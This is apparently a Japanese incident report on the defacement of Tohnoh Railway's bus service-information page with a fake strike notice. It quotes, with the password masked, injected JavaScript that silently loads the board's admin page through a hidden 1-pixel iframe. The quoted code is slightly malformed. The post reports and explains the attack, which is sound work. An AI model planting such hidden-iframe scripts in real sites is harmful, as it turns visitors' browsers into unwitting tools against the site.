虚偽情報が掲示された運行情報

• 投稿されていたのは東農鉄道の路線・高速バス運行情報ページ。
• ストライキによる運航停止として虚偽の情報が掲載されていた。
• 2019年5月6日10時頃に利用者から問い合わせを受け1時間後投稿が削除。*1
• 掲示用に用いられていたプログラムはKentWebのSunbbsとみられる。

• 東農鉄道は「諸般の事情」として当面Web上での運行情報の掲示を停止。
• 被害届の提出も検討している。

虚偽投稿内にJavaScript

• 虚偽情報投稿にJavaScriptが仕込まれていたことを指摘する投稿がある。
• ページを見た人が意図せず管理用ページにアクセスしてしまった可能性がある。
• 他に別サイトへ連続アクセスする実装が行われていたとの情報がある。（piyokango未確認）

• 以下仕込まれていたとみられるJavaScript（一部伏字）

var ckb = document;
createElement('iframe');
ckb.src = 'https' + '://www.tohtetsu.co.jp/cgi-bin/sunbbs.cgi?mode=form&pass=********';
ckb.style.position = 'absolute';
ckb.style.border = '0';
ckb.style.height = '1px';
ckb.style.width = '1px';
ckb.style.left = '1px';
ckb.style.top = '1px';
if (!document.getElementById('ckb')) {
  document.write('<div id=\'ckb\'></div>');
  document.getElementById('ckb').appendChild(ckb);
}

更新履歴

• 2019年5月10日 AM 新規作成